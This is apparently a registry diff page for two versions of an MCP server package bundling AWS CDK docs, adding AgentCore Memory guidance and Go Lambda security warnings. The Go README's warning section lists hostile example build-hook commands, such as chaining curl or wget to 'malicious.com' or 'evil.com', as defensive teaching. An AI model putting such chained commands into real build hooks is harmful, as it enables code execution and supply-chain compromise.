PyPI - konokenj.cdk-api-mcp-server - Versions diffs - 0.51.0__py3-none-any.whl → 0.53.0__py3-none-any.whl - Mend

konokenj.cdk-api-mcp-server 0.51.0py3-none-any.whl → 0.53.0py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (46) hide show

cdk_api_mcp_server/__about__.py CHANGED Viewed

@@ -1,4 +1,4 @@
 # SPDX-FileCopyrightText: 2025-present Kenji Kono <konoken@amazon.co.jp>
 #
 # SPDX-License-Identifier: MIT
-__version__ = "0.51.0"
+__version__ = "0.53.0"

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-bedrock-agentcore-alpha/README.md CHANGED Viewed

@@ -45,6 +45,11 @@ This construct library facilitates the deployment of Bedrock AgentCore primitive
   - [Code Interpreter Network Modes](#code-interpreter-network-modes)
   - [Basic Code Interpreter Creation](#basic-code-interpreter-creation)
   - [Code Interpreter IAM permissions](#code-interpreter-iam-permissions)
+- [Memory](#memory)
+  - [Memory properties](#memory-properties)
+  - [Basic Memory Creation](#basic-memory-creation)
+  - [LTM Memory Extraction Stategies](#ltm-memory-extraction-stategies)
+  - [Memory Strategy Methods](#memory-strategy-methods)
 ## AgentCore Runtime
@@ -298,6 +303,10 @@ IAM authentication is the default mode, when no authorizerConfiguration is set t
 To configure AWS Cognito User Pool authentication:
 ```typescript
+declare const userPool: cognito.UserPool;
+declare const userPoolClient: cognito.UserPoolClient;
+declare const anotherUserPoolClient: cognito.UserPoolClient;
 const repository = new ecr.Repository(this, "TestRepository", {
   repositoryName: "test-agent-runtime",
 });
@@ -307,9 +316,8 @@ const runtime = new agentcore.Runtime(this, "MyAgentRuntime", {
   runtimeName: "myAgent",
   agentRuntimeArtifact: agentRuntimeArtifact,
   authorizerConfiguration: agentcore.RuntimeAuthorizerConfiguration.usingCognito(
-    "us-west-2_ABC123",  // User Pool ID (required)
-    "client123",         // Client ID (required)
-    "us-west-2"         // Region (optional, defaults to stack region)
+    userPool, // User Pool (required)
+    [userPoolClient, anotherUserPoolClient], // User Pool Clients
   ),
 });
 ```
@@ -794,3 +802,317 @@ const codeInterpreter = new agentcore.CodeInterpreterCustom(this, "MyCodeInterpr
   },
 });
 ```
+## Memory
+Memory is a critical component of intelligence. While Large Language Models (LLMs) have impressive capabilities, they lack persistent memory across conversations. Amazon Bedrock AgentCore Memory addresses this limitation by providing a managed service that enables AI agents to maintain context over time, remember important facts, and deliver consistent, personalized experiences.
+AgentCore Memory operates on two levels:
+- **Short-Term Memory**: Immediate conversation context and session-based information that provides continuity within a single interaction or closely related sessions.
+- **Long-Term Memory**: Persistent information extracted and stored across multiple conversations, including facts, preferences, and summaries that enable personalized experiences over time.
+When you interact with the memory via the `CreateEvent` API, you store interactions in Short-Term Memory (STM) instantly. These interactions can include everything from user messages, assistant responses, to tool actions.
+To write to long-term memory, you need to configure extraction strategies which define how and where to store information from conversations for future use. These strategies are asynchronously processed from raw events after every few turns based on the strategy that was selected. You can't create long term memory records directly, as they are extracted asynchronously by AgentCore Memory.
+### Memory Properties
+| Name | Type | Required | Description |
+|------|------|----------|-------------|
+| `memoryName` | `string` | Yes | The name of the memory |
+| `expirationDuration` | `Duration` | No | Short-term memory expiration in days (between 7 and 365). Default: 90 days |
+| `description` | `string` | No | Optional description for the memory. Default: no description. |
+| `kmsKey` | `IKey` | No | Custom KMS key to use for encryption. Default: Your data is encrypted with a key that AWS owns and manages for you |
+| `memoryStrategies` | `MemoryStrategyBase[]` | No | Built-in extraction strategies to use for this memory. Default: No extraction strategies (short term memory only) |
+| `executionRole` | `iam.IRole` | No | The IAM role that provides permissions for the memory to access AWS services. Default: A new role will be created. |
+| `tags` | `{ [key: string]: string }` | No | Tags for memory. Default: no tags. |
+### Basic Memory Creation
+Below you can find how to configure a simple short-term memory (STM) with no long-term memory extraction strategies.
+Note how you set `expirationDuration`, which defines the time the events will be stored in the short-term memory before they expire.
+```typescript fixture=default
+// Create a basic memory with default settings, no LTM strategies
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my_memory",
+  description: "A memory for storing user interactions for a period of 90 days",
+  expirationDuration: cdk.Duration.days(90),
+});
+```
+Basic Memory with Custom KMS Encryption
+```typescript fixture=default
+// Create a custom KMS key for encryption
+const encryptionKey = new kms.Key(this, "MemoryEncryptionKey", {
+  enableKeyRotation: true,
+  description: "KMS key for memory encryption",
+});
+// Create memory with custom encryption
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my_encrypted_memory",
+  description: "Memory with custom KMS encryption",
+  expirationDuration: cdk.Duration.days(90),
+  kmsKey: encryptionKey,
+});
+```
+### LTM Memory Extraction Stategies
+If you need long-term memory for context recall across sessions, you can setup memory extraction strategies
+to extract the relevant memory from the raw events.
+Amazon Bedrock AgentCore Memory has different memory strategies for extracting and organizing information:
+- **Summarization**: to summarize interactions to preserve critical context and key insights.
+- **Semantic Memory**: to extract general factual knowledge, concepts and meanings from raw conversations using vector embeddings.
+This enables similarity-based retrieval of relevant facts and context.
+- **User Preferences**: to extract user behavior patterns from raw conversations.
+You can use built-in extraction strategies for quick setup, or create custom extraction strategies with specific models and prompt templates.
+### Memory with Built-in Strategies
+The library provides three built-in LTM strategies. These are default strategies for organizing and extracting memory data,
+each optimized for specific use cases.
+For example: An agent helps multiple users with cloud storage setup. From these conversations,
+see how each strategy processes users expressing confusion about account connection:
+1. **Summarization Strategy** (`MemoryStrategy.usingBuiltInSummarization()`)
+This strategy compresses conversations into concise overviews, preserving essential context and key insights for quick recall.
+Extracted memory example: Users confused by cloud setup during onboarding.
+   - Extracts concise summaries to preserve critical context and key insights
+   - Namespace: `/strategies/{memoryStrategyId}/actors/{actorId}/sessions/{sessionId}`
+2. **Semantic Memory Strategy** (`MemoryStrategy.usingBuiltInSemantic()`)
+Distills general facts, concepts, and underlying meanings from raw conversational data, presenting the information in a context-independent format.
+Extracted memory example: In-context learning = task-solving via examples, no training needed.
+   - Extracts general factual knowledge, concepts and meanings from raw conversations
+   - Namespace: `/strategies/{memoryStrategyId}/actors/{actorId}`
+3. **User Preference Strategy** (`MemoryStrategy.usingBuiltInUserPreference()`)
+Captures individual preferences, interaction patterns, and personalized settings to enhance future experiences.
+Extracted memory example: User needs clear guidance on cloud storage account connection during onboarding.
+   - Extracts user behavior patterns from raw conversations
+   - Namespace: `/strategies/{memoryStrategyId}/actors/{actorId}`
+```typescript fixture=default
+// Create memory with built-in strategies
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my_memory",
+  description: "Memory with built-in strategies",
+  expirationDuration: cdk.Duration.days(90),
+  memoryStrategies: [
+    agentcore.MemoryStrategy.usingBuiltInSummarization(),
+    agentcore.MemoryStrategy.usingBuiltInSemantic(),
+    agentcore.MemoryStrategy.usingBuiltInUserPreference(),
+  ],
+});
+```
+The name generated for each built in memory strategy is as follows:
+- For Summarization: `summary_builtin_cdk001`
+- For Semantic:`semantic_builtin_cdk001>`
+- For User Preferences: `preference_builtin_cdk001`
+### Memory with custom Strategies
+With Long-Term Memory, organization is managed through Namespaces.
+An `actor` refers to entity such as end users or agent/user combinations. For example, in a coding support chatbot,
+the actor is usually the developer asking questions. Using the actor ID helps the system know which user the memory belongs to,
+keeping each user's data separate and organized.
+A `session` is usually a single conversation or interaction period between the user and the AI agent.
+It groups all related messages and events that happen during that conversation.
+A `namespace` is used to logically group and organize long-term memories. It ensures data stays neat, separate, and secure.
+With AgentCore Memory, you need to add a namespace when you define a memory strategy. This namespace helps define where the long-term memory
+will be logically grouped. Every time a new long-term memory is extracted using this memory strategy, it is saved under the namespace you set.
+This means that all long-term memories are scoped to their specific namespace, keeping them organized and preventing any mix-ups with other
+users or sessions. You should use a hierarchical format separated by forward slashes /. This helps keep memories organized clearly. As needed,
+you can choose to use the below pre-defined variables within braces in the namespace based on your applications' organization needs:
+- `actorId` – Identifies who the long-term memory belongs to, such as a user
+- `memoryStrategyId` – Shows which memory strategy is being used. This strategy identifier is auto-generated when you create a memory using CreateMemory operation.
+- `sessionId` – Identifies which session or conversation the memory is from.
+For example, if you define the following namespace as the input to your strategy in CreateMemory operation:
+```shell
+/strategy/{memoryStrategyId}/actor/{actorId}/session/{sessionId}
+```
+After memory creation, this namespace might look like:
+```shell
+/strategy/summarization-93483043//actor/actor-9830m2w3/session/session-9330sds8
+```
+You can customise the namespace, i.e. where the memories are stored by using the following methods:
+1. **Summarization Strategy** (`MemoryStrategy.usingSummarization(props)`)
+1. **Semantic Memory Strategy** (`MemoryStrategy.usingSemantic(props)`)
+1. **User Preference Strategy** (`MemoryStrategy.usingUserPreference(props)`)
+```typescript fixture=default
+// Create memory with built-in strategies
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my_memory",
+  description: "Memory with built-in strategies",
+  expirationDuration: cdk.Duration.days(90),
+  memoryStrategies: [
+    agentcore.MemoryStrategy.usingUserPreference({
+        name: "CustomerPreferences",
+        namespaces: ["support/customer/{actorId}/preferences"]
+    }),
+    agentcore.MemoryStrategy.usingSemantic({
+        name: "CustomerSupportSemantic",
+        namespaces: ["support/customer/{actorId}/semantic"]
+    }),
+  ],
+});
+```
+Custom memory strategies let you tailor memory extraction and consolidation to your specific domain or use case.
+You can override the prompts for extracting and consolidating semantic, summary, or user preferences.
+You can also choose the model that you want to use for extraction and consolidation.
+The custom prompts you create are appended to a non-editable system prompt.
+Since a custom strategy requires you to invoke certain FMs, you need a role with appropriate permissions. For that, you can:
+- Let the L2 construct create a minimum permission role for you when use L2 Bedrock Foundation Models.
+- Use a custom role with the overly permissive `AmazonBedrockAgentCoreMemoryBedrockModelInferenceExecutionRolePolicy` managed policy.
+- Use a custom role with your own custom policies.
+#### Memory with Custom Execution Role
+Keep in mind that memories that **do not** use custom strategies do not require a service role.
+So even if you provide it, it will be ignored as it will never be used.
+```typescript fixture=default
+// Create a custom execution role
+const executionRole = new iam.Role(this, "MemoryExecutionRole", {
+  assumedBy: new iam.ServicePrincipal("bedrock-agentcore.amazonaws.com"),
+  managedPolicies: [
+    iam.ManagedPolicy.fromAwsManagedPolicyName(
+      "AmazonBedrockAgentCoreMemoryBedrockModelInferenceExecutionRolePolicy"
+    ),
+  ],
+});
+// Create memory with custom execution role
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my_memory",
+  description: "Memory with custom execution role",
+  expirationDuration: cdk.Duration.days(90),
+  executionRole: executionRole,
+});
+```
+In customConsolidation and customExtraction, the model property uses the [@aws-cdk/aws-bedrock-alph](https://www.npmjs.com/package/@aws-cdk/aws-bedrock-alpha) library which must be installed separately.
+```typescript fixture=default
+// Create a custom semantic memory strategy
+const customSemanticStrategy = agentcore.MemoryStrategy.usingSemantic({
+  name: "customSemanticStrategy",
+  description: "Custom semantic memory strategy",
+  namespaces: ["/custom/strategies/{memoryStrategyId}/actors/{actorId}"],
+  customConsolidation: {
+    model: bedrock.BedrockFoundationModel.ANTHROPIC_CLAUDE_3_5_SONNET_V1_0,
+    appendToPrompt: "Custom consolidation prompt for semantic memory",
+  },
+  customExtraction: {
+    model: bedrock.BedrockFoundationModel.ANTHROPIC_CLAUDE_3_5_SONNET_V1_0,
+    appendToPrompt: "Custom extraction prompt for semantic memory",
+  },
+});
+// Create memory with custom strategy
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my-custom-memory",
+  description: "Memory with custom strategy",
+  expirationDuration: cdk.Duration.days(90),
+  memoryStrategies: [customSemanticStrategy],
+});
+```
+### Memory with self-managed Strategies
+A self-managed strategy in Amazon Bedrock AgentCore Memory gives you complete control over your memory extraction and consolidation pipelines.
+With a self-managed strategy, you can build custom memory processing workflows while leveraging Amazon Bedrock AgentCore for storage and retrieval.
+For additional information, you can refer to the [developer guide for self managed strategies](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/memory-self-managed-strategies.html).
+Create the required AWS resources including:
+- an S3 bucket in your account where Amazon Bedrock AgentCore will deliver batched event payloads.
+- an SNS topic for job notifications. Use FIFO topics if processing order within sessions is important for your use case.
+The construct will apply the correct permissions to the memory execution role to access these resources.
+```typescript fixture=default
+const bucket = new s3.Bucket(this, 'memoryBucket', {
+  bucketName: 'test-memory',
+  removalPolicy: cdk.RemovalPolicy.DESTROY,
+  autoDeleteObjects: true,
+});
+const topic = new sns.Topic(this, 'topic');
+// Create a custom semantic memory strategy
+const selfManagedStrategy = agentcore.MemoryStrategy.usingSelfManaged({
+  name: "selfManagedStrategy",
+  description: "self managed memory strategy",
+  historicalContextWindowSize: 5,
+  invocationConfiguration: {
+    topic: topic,
+    s3Location: {
+      bucketName: bucket.bucketName,
+      objectKey: 'memory/',
+    }
+  },
+  triggerConditions: {
+    messageBasedTrigger: 1,
+    timeBasedTrigger: cdk.Duration.seconds(10),
+    tokenBasedTrigger: 100
+  }
+});
+// Create memory with custom strategy
+const memory = new agentcore.Memory(this, "MyMemory", {
+  memoryName: "my-custom-memory",
+  description: "Memory with custom strategy",
+  expirationDuration: cdk.Duration.days(90),
+  memoryStrategies: [selfManagedStrategy],
+});
+```
+### Memory Strategy Methods
+You can add new memory strategies to the memory construct using the `addMemoryStrategy()` method, for instance:
+```typescript fixture=default
+// Create memory without initial strategies
+const memory = new agentcore.Memory(this, "test-memory", {
+  memoryName: "test_memory_add_strategy",
+  description: "A test memory for testing addMemoryStrategy method",
+  expirationDuration: cdk.Duration.days(90),
+});
+// Add strategies after instantiation
+memory.addMemoryStrategy(agentcore.MemoryStrategy.usingBuiltInSummarization());
+memory.addMemoryStrategy(agentcore.MemoryStrategy.usingBuiltInSemantic());
+```

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-lambda-go-alpha/README.md CHANGED Viewed

@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,19 +202,21 @@ new go.GoFunction(this, 'GoFunction', {
 ## Command hooks
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
+  entry: 'cmd/api',
   bundling: {
     commandHooks: {
       // run tests
       beforeBundling(inputDir: string): string[] {
         return ['go test ./cmd/api -v'];
       },
-      // ...
+      afterBundling(inputDir: string, outputDir: string): string[] {
+        return ['echo "Build complete"'];
+      },
     },
   },
 });
@@ -230,6 +234,100 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
+### ⚠️ Security Considerations
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+**Safe patterns (cross-platform):**
+```ts
+new go.GoFunction(this, 'SafeFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test ./...',           // ✅ Standard Go commands work on all OS
+        'go mod tidy',             // ✅ Go module commands
+        'make clean',              // ✅ Build tools (if available)
+        'echo "Building app"',     // ✅ Simple output with quotes
+      ],
+      afterBundling: () => ['echo "Build complete"'],
+    },
+  },
+});
+```
+**Dangerous patterns to avoid:**
+*Windows-specific dangers:*
+```ts
+// ❌ Windows-specific dangers
+new go.GoFunction(this, 'UnsafeWindowsFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+        'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+        'powershell -Command "..."',            // ❌ PowerShell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+*Unix/Linux/macOS dangers:*
+```ts
+// ❌ Unix/Linux/macOS dangers
+new go.GoFunction(this, 'UnsafeUnixFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test; curl malicious.com',          // ❌ Command chaining with ;
+        'echo $(whoami)',                       // ❌ Command substitution
+        'bash -c "wget evil.com"',              // ❌ Shell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+**When using third-party constructs** that include `GoFunction`:
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+## Security Best Practices
+### Third-Party Construct Safety
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+**Before using any third-party construct:**
+* Review the construct's source code on GitHub or npm
+* Search for `commandHooks` and `goBuildFlags` usage in the code
+* Verify no dangerous command patterns are present
+* Use exact version pinning to prevent supply chain attacks
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
 ## Additional considerations
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-apigateway/README.md CHANGED Viewed

@@ -1652,6 +1652,15 @@ const api = new apigateway.SpecRestApi(this, 'books-api', {
 });
 ```
+`SpecRestApi` also supports binary media types, similar to `RestApi`:
+```ts
+const api = new apigateway.SpecRestApi(this, 'books-api', {
+  apiDefinition: apigateway.ApiDefinition.fromAsset('path-to-file.json'),
+  binaryMediaTypes: ['image/png', 'application/pdf']
+});
+```
 ### Endpoint configuration
 By default, `SpecRestApi` will create an edge optimized endpoint.

cdk_api_mcp_server/resources/aws-cdk/constructs/aws-cdk-lib/aws-apigateway/integ.spec-restapi.ts CHANGED Viewed

@@ -14,6 +14,7 @@ class Test extends cdk.Stack {
       apiDefinition: apigateway.ApiDefinition.fromAsset(path.join(__dirname, 'sample-definition.yaml')),
       disableExecuteApiEndpoint: true,
       minCompressionSize: Size.bytes(1024),
+      binaryMediaTypes: ['image/png', 'application/pdf'],
       retainDeployments: true,
       cloudWatchRole: true,
       deployOptions: {

konokenj.cdk-api-mcp-server 0.51.0__py3-none-any.whl → 0.53.0__py3-none-any.whl

konokenj.cdk-api-mcp-server 0.51.0py3-none-any.whl → 0.53.0py3-none-any.whl